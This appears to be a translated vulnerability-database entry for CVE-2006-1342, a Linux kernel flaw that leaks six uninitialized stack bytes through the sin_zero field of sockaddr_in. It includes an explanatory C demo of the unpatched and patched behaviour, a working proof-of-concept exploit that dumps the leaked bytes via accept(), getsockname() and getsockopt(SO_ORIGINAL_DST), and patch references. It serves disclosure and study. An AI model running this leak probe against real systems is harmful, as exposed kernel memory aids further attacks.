Linux Kernel sockaddr_in.sin_zero Kernel Memory Disclosure Vulnerability

Vulnerability ID: 1109943  Vulnerability Type: Design Error
Published: 2006-03-23  Updated: 2006-03-23
CVE ID: CVE-2006-1342  CNNVD ID: CNNVD-200603-363
Platform: Linux  CVSS Score: 2.1
|Vulnerability Source
https://www.exploit-db.com/exploits/27461
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-363
|Vulnerability Details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The NFSv4 implementation is one of its distributed file system protocols. The Linux kernel has a vulnerability in the execution of certain socket functions that can leak some data from kernel memory: when it retrieves the address of a given socket through these functions, it returns the sockaddr_in.sin_zero array to the user-space program without zeroing it. An attacker can call getsockopt() with the SO_ORIGINAL_DST option, or call getsockname(), getpeername() or accept(), to leak 6 uninitialized bytes from the kernel stack. Note: the issue in getsockname(), getpeername() and accept() only affects 2.4 kernels.
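The root cause described above, a partly filled sockaddr_in copied to user space with sin_zero still holding stale stack bytes, and the shape of the kernel's fix, shown here as an added illustration that is not part of this entry, the exploit below, or the kernel source. The fill_addr_* functions are hypothetical user-space stand-ins for the kernel side, and the 0xA5 fill is a constructed substitute for stale stack contents; sin_zero_leaked_bytes() can also be run on a real accept() or getsockname() result.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
/* Length of the sin_zero padding that the vulnerable kernel left uninitialized. */
#define SIN_ZERO_LEN sizeof(((struct sockaddr_in *)0)->sin_zero)

/* Count non-zero bytes in sin_zero of an address handed back by the kernel; a patched kernel yields 0. */
int sin_zero_leaked_bytes(const struct sockaddr_in *sa)
{
    int n = 0;
    for (size_t i = 0; i < SIN_ZERO_LEN; i++)
        if (sa->sin_zero[i] != 0) n++;
    return n;
}

/* Stand-in for the unpatched kernel: only the meaningful fields are written, sin_zero keeps stack contents. */
void fill_addr_unpatched(struct sockaddr_in *sin, uint32_t addr_be, uint16_t port_be)
{
    sin->sin_family = AF_INET;
    sin->sin_addr.s_addr = addr_be;
    sin->sin_port = port_be;
}

/* The shape of the fix: clear the padding before the struct leaves the kernel. */
void fill_addr_patched(struct sockaddr_in *sin, uint32_t addr_be, uint16_t port_be)
{
    fill_addr_unpatched(sin, addr_be, port_be);
    memset(sin->sin_zero, 0, SIN_ZERO_LEN);
}

/* Pre-fill with a constructed "stale stack" pattern, run one variant, return unzeroed padding bytes. */
int demo(int patched)
{
    struct sockaddr_in sin;
    memset(&sin, 0xA5, sizeof(sin));
    if (patched)
        fill_addr_patched(&sin, htonl(INADDR_LOOPBACK), htons(8080));
    else
        fill_addr_unpatched(&sin, htonl(INADDR_LOOPBACK), htons(8080));
    return sin_zero_leaked_bytes(&sin);
}

int main(void)
{
    printf("unpatched: %d stale bytes in sin_zero\n", demo(0));
    printf("patched:   %d stale bytes in sin_zero\n", demo(1));
    return 0;
}
```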
|Vulnerability EXP
/*
source: http://www.securityfocus.com/bid/17203/info

The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users.

These issues allow an attacker to read kernel memory and potentially gather information to use in further attacks.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/netfilter_ipv4.h>

/* Hex-dump a buffer. For a struct sockaddr_in the trailing bytes are
   sin_zero, which a patched kernel returns as all zeros. */
void
dump(const unsigned char *p, unsigned l)
{
  printf("data:");
  while (l > 0) {
    printf(" %02x", *p);
    ++p; --l;
  }
  printf("\n");
}

int
main(int argc, char **argv)
{
  int port;
  int ls, as, r, one;
  struct sockaddr_in sa;
  socklen_t sl;

  if (argc != 2 || (port = atoi(argv[1])) == 0) {
    fprintf(stderr, "usage: bug PORT\n");
    return (1);
  }

  ls = socket(PF_INET, SOCK_STREAM, 0);
  if (ls == -1) {
    perror("ls = socket");
    return (1);
  }
  one = 1;
  r = setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
  if (r == -1) {
    perror("setsockopt(ls)");
    return (1);
  }
  /* Zero the whole struct so sin_zero starts out clean on our side. */
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_addr.s_addr = INADDR_ANY;
  sa.sin_port = htons(port);
  r = bind(ls, (struct sockaddr *) &sa, sizeof(sa));
  if (r == -1) {
    perror("bind(ls)");
    return (1);
  }
  r = listen(ls, 1);
  if (r == -1) {
    perror("listen(ls)");
    return (1);
  }

  /* Zero sa before each call so any non-zero sin_zero bytes in the dump
     can only have been written by the kernel. */
  memset(&sa, 0, sizeof(sa));
  sl = sizeof(sa);
  as = accept(ls, (struct sockaddr *) &sa, &sl);
  if (as == -1) {
    perror("accept(ls)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));  /* peer address from accept() (2.4 only) */

  memset(&sa, 0, sizeof(sa));
  sl = sizeof(sa);
  r = getsockname(as, (struct sockaddr *) &sa, &sl);
  if (r == -1) {
    perror("getsockname(as)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));

  /* SO_ORIGINAL_DST (netfilter) is affected on both 2.4 and 2.6 kernels. */
  memset(&sa, 0, sizeof(sa));
  sl = sizeof(sa);
  r = getsockopt(as, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *) &sa, &sl);
  if (r == -1) {
    perror("getsockopt(as)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));

  return (0);
}
|References

Source: www.kernel.org
Link: http://www.kernel.org/git/?p=linux/kernel/git/marcelo/linux-2.4.git;a=commit;h=09d3b3dcfa80c9094f1748c1be064b9326c9ef2b
Source: MLIST
Name: [linux-netdev] 20060304 BUG: Small information leak in SO_ORIGINAL_DST (2.4 and 2.6) and
Link: http://marc.theaimsgroup.com/?l=linux-netdev&m=114148078223594&w=2
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-254-200610-patch.html
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-213-200610-patch.html
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-202-200610-patch.html
Source: BID
Name: 17203
Link: http://www.securityfocus.com/bid/17203
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0008 - VMware ESX Server 2.0.2 Upgrade Patch 2
Link: http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0005 - VMware ESX Server 2.5.4 Upgrade Patch 1
Link: http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0007 - VMware ESX Server 2.1.3 Upgrade Patch 2
Link: http://www.securityfocus.c